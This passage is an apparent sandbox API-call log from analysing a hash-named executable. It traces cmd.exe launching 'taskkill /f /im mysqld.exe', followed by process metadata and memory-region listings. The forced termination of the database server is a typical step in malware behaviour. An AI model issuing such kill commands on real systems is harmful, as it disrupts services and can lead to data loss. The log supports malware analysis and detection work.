returned 0x5cb080 [0187.017] GetProcessHeap () returned 0x5c0000 [0187.017] RtlReAllocateHeap (Heap=0x5c0000, Flags=0x0, Ptr=0x5cb080, Size=0x76) returned 0x5cb080 [0187.017] GetProcessHeap () returned 0x5c0000 [0187.017] RtlSizeHeap (HeapHandle=0x5c0000, Flags=0x0, MemoryPointer=0x5cb080) returned 0x76 [0187.017] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0187.017] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0187.018] GetLastError () returned 0x2 [0187.018] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0187.018] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x5cb100 [0187.018] GetProcessHeap () returned 0x5c0000 [0187.018] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x14) returned 0x5c7648 [0187.018] FindClose (in: hFindFile=0x5cb100 | out: hFindFile=0x5cb100) returned 1 [0187.019] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0187.019] GetLastError () returned 0x2 [0187.019] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x5cb100 [0187.019] GetProcessHeap () returned 0x5c0000 [0187.019] RtlReAllocateHeap (Heap=0x5c0000, Flags=0x0, Ptr=0x5c7648, Size=0x4) returned 0x5cb140 [0187.019] FindClose (in: hFindFile=0x5cb100 | out: hFindFile=0x5cb100) returned 1 [0187.019] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0187.019] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0187.019] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0187.022] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0187.022] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0187.022] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x144, hStdOutput=0x154, hStdError=0x158)) [0187.022] GetProcessHeap () returned 0x5c0000 [0187.022] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x18) returned 0x5c77a8 [0187.022] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0187.022] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0187.022] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0187.022] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0187.022] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0187.022] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0187.022] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0187.022] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0187.022] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0187.022] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0187.022] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0187.022] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0187.022] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0187.022] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0187.022] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0187.023] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0187.023] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0187.023] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0187.023] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0187.023] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0187.023] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0187.023] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0187.023] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0187.023] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0187.023] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0187.023] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0187.023] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0187.023] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0187.023] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0187.023] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0187.023] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0187.023] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0187.023] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0187.023] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0187.023] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0187.023] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0187.023] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0187.023] GetProcessHeap () returned 0x5c0000 [0187.023] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x5c77a8) returned 1 [0187.024] GetProcessHeap () returned 0x5c0000 [0187.024] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0xa) returned 0x5cb100 [0187.024] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0187.028] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im mysqld.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im mysqld.exe ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="taskkill /f /im mysqld.exe ", lpProcessInformation=0x19f6fc*(hProcess=0x9c, hThread=0x98, dwProcessId=0x12ec, dwThreadId=0x1294)) returned 1 [0187.056] CloseHandle (hObject=0x98) returned 1 [0187.056] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0187.056] GetProcessHeap () returned 0x5c0000 [0187.057] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x5c9d50) returned 1 [0187.057] GetEnvironmentStringsW () returned 0x5c9d50* [0187.057] GetProcessHeap () returned 0x5c0000 [0187.057] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0xa76) returned 0x5cbc50 [0187.057] FreeEnvironmentStringsA (penv="=") returned 1 [0187.057] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0188.569] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x80) returned 1 [0188.569] CloseHandle (hObject=0x9c) returned 1 [0188.569] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000080") returned 8 [0188.570] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0188.570] GetProcessHeap () returned 0x5c0000 [0188.571] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x5cbc50) returned 1 [0188.571] GetEnvironmentStringsW () returned 0x5cb150* [0188.571] GetProcessHeap () returned 0x5c0000 [0188.571] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0xa9c) returned 0x5cbbf8 [0188.571] FreeEnvironmentStringsA (penv="=") returned 1 [0188.571] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0188.571] GetProcessHeap () returned 0x5c0000 [0188.571] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x5cbbf8) returned 1 [0188.572] GetEnvironmentStringsW () returned 0x5cb150* [0188.572] GetProcessHeap () returned 0x5c0000 [0188.572] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0xa9c) returned 0x5cbbf8 [0188.572] FreeEnvironmentStringsA (penv="=") returned 1 [0188.572] GetProcessHeap () returned 0x5c0000 [0188.572] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x5cb100) returned 1 [0188.572] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0188.572] _get_osfhandle (_FileHandle=1) returned 0x154 [0188.572] SetConsoleMode (hConsoleHandle=0x154, dwMode=0x0) returned 0 [0188.572] _get_osfhandle (_FileHandle=1) returned 0x154 [0188.573] GetConsoleMode (in: hConsoleHandle=0x154, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0188.573] _get_osfhandle (_FileHandle=0) returned 0x144 [0188.573] GetConsoleMode (in: hConsoleHandle=0x144, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0188.573] GetConsoleOutputCP () returned 0x1b5 [0188.574] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0188.574] SetThreadUILanguage (LangId=0x0) returned 0x409 [0188.575] exit (_Code=128) Thread: id = 257 os_tid = 0x12a8 Process: id = "47" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x33e1c000" os_pid = "0x12ec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "46" os_parent_pid = "0x1280" cmd_line = "taskkill /f /im mysqld.exe " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3535 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3536 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3537 start_va = 0x40000 end_va = 0x43fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3538 start_va = 0x50000 end_va = 0x65fff monitored = 0 entry_point = 0x5de80 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 3539 start_va = 0x70000 end_va = 0x406ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 3540 start_va = 0x4070000 end_va = 0x4084fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004070000" filename = "" Region: id = 3541 start_va = 0x4090000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 3542 start_va = 0x40d0000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 3543 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004110000" filename = "" Region: id = 3544 start_va = 0x4120000 end_va = 0x4121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 3545 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 3546 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3547 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3548 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3549 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3550 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 3551 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3552 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 3553 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 3554 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3555 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3556 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3557 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3558 start_va = 0x4400000 end_va = 0x454ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 3559 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3560 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3561 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3562 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3563 start_va = 0x4550000 end_va = 0x460dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3564 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3565 start_va = 0x74650000 end_va = 0x746cafff monitored = 0 entry_point = 0x7466e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3566 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3567 start_va = 0x4130000 end_va = 0x416ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004130000" filename = "" Region: id = 3568 start_va = 0x4170000 end_va = 0x41affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004170000" filename = "" Region: id = 3569 start_va = 0x76ae0000 end_va = 0x76b23fff monitored = 0 entry_point = 0x76af9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3570 start_va = 0x75260000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75274f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3571 start_va = 0x74450000 end_va = 0x7446dfff monitored = 0 entry_point = 0x7445b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3572 start_va = 0x74440000 end_va = 0x74449fff monitored = 0 entry_point = 0x74442a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3573 start_va = 0x74590000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745d25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3574 start_va = 0x77450000 end_va = 0x77596fff monitored = 0 entry_point = 0x77461cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3575 start_va = 0x76b30000 end_va = 0x76c7efff monitored = 0 entry_point = 0x76be6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3576 start_va = 0x753c0000 end_va = 0x75451fff monitored = 0 entry_point = 0x753f8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 3577 start_va = 0x77290000 end_va = 0x7744cfff monitored = 0 entry_point = 0x77372a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3578 start_va = 0x75310000 end_va = 0x7536efff monitored = 0 entry_point = 0x75314af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 3579 start_va = 0x77240000 end_va = 0x77284fff monitored = 0 entry_point = 0x7725de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3580 start_va = 0x6cda0000 end_va = 0x6cda7fff monitored = 0 entry_point = 0x6cda17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 3581 start_va = 0x6cd80000 end_va = 0x6cd95fff monitored = 0 entry_point = 0x6cd821d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 3582 start_va = 0x6ccb0000 end_va = 0x6cceefff monitored = 0 entry_point = 0x6ccc46c0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 3583 start_va = 0x6c9a0000 end_va = 0x6cadefff monitored = 0 entry_point = 0x6c9cd880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 3584 start_va = 0x6cd60000 end_va = 0x6cd7bfff monitored = 0 entry_point = 0x6cd64720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 3585 start_va = 0x6cd50000 end_va = 0x6cd59fff monitored = 0 entry_point = 0x6cd528d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 3586 start_va = 0x4610000 end_va = 0x475ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004610000" filename = "" Region: id = 3587 start_va = 0x41b0000 end_va = 0x41d9fff monitored = 0 entry_point = 0x41b5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3588 start_va = 0x4760000 end_va = 0x48e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004760000" filename = "" Region: id = 3589 start_va = 0x74ea0000 end_va = 0x74ecafff monitored = 0 entry_point = 0x74ea5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3590 start_va = 0x48f0000 end_va = 0x4a70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000048f0000" filename = "" Region: id = 3591 start_va = 0x4a80000 end_va = 0x5e7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a80000" filename = "" Region: id = 3592 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3593 start_va = 0x41b0000 end_va = 0x41b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041b0000" filename = "" Region: id = 3594 start_va = 0x41c0000 end_va = 0x41c4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui") Region: id = 3595 start_va = 0x41d0000 end_va = 0x41d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041d0000" filename = "" Region: id = 3596 start_va = 0x41f0000 end_va = 0x41f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 3597 start_va = 0x5e80000 end_va = 0x61b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3598 start_va = 0x4610000 end_va = 0x46f9fff monitored = 0 entry_point = 0x464d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3599 start_va = 0x4750000 end_va = 0x475ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004750000" filename = "" Region: id = 3600 start_va = 0x4400000 end_va = 0x4403fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 3601 start_va = 0x4450000 end_va = 0x454ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004450000" filename = "" Region: id = 3602 start_va = 0x4610000 end_va = 0x46effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 3603 start_va = 0x76e20000 end_va = 0x76e2bfff monitored = 0 entry_point = 0x76e23930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 3604 start_va = 0x4410000 end_va = 0x4410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004410000" filename = "" Region: id = 3605 start_va = 0x76c80000 end_va = 0x76d03fff monitored = 0 entry_point = 0x76ca6220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 3606 start_va = 0x4420000 end_va = 0x4420fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004420000" filename = "" Region: id = 3607 start_va = 0x6cca0000 end_va = 0x6ccacfff monitored = 0 entry_point = 0x6cca3520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 3608 start_va = 0x6cc30000 end_va = 0x6cc96fff monitored = 0 entry_point = 0x6cc4b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 3609 start_va = 0x740f0000 end_va = 0x7410afff monitored = 0 entry_point = 0x740f9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 3610 start_va = 0x6cbe0000 end_va = 0x6cc23fff monitored = 0 entry_point = 0x6cbfaaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 3611 start_va = 0x46f0000 end_va = 0x472ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046f0000" filename = "" Region: id = 3612 start_va = 0x61c0000 end_va = 0x61fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000061c0000" filename = "" Region: id = 3613 start_va = 0x6200000 end_va = 0x623ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006200000" filename = "" Region: id = 3614 start_va = 0x6240000 end_va = 0x627ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006240000" filename = "" 